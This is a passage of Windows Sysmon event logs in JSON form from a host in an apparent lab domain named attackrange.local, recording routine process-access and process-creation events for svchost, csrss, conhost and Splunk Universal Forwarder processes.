{41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3109,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3110,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3111,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3112,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3113,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010C14C0500}\r\nTargetProcessId: 4456\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010C14C0500}","TargetProcessId":"4456","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3114,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.038\r\nProcessGuid: {41C8662E-1FF3-5F25-0000-00107C4D0500}\r\nProcessId: 4620\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-0010C14C0500}\r\nParentProcessId: 4456\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.038","ProcessGuid":"{41C8662E-1FF3-5F25-0000-00107C4D0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-0010C14C0500}","ParentProcessId":"4456","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list general --no-log","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3115,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-0010C14C0500}\r\nSourceProcessId: 4456\r\nSourceThreadId: 4624\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00107C4D0500}\r\nTargetProcessId: 4620\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-0010C14C0500}","SourceProcessId":"4456","SourceThreadId":"4624","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00107C4D0500}","TargetProcessId":"4620","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3116,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00107C4D0500}\r\nTargetProcessId: 4620\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00107C4D0500}","TargetProcessId":"4620","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3117,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 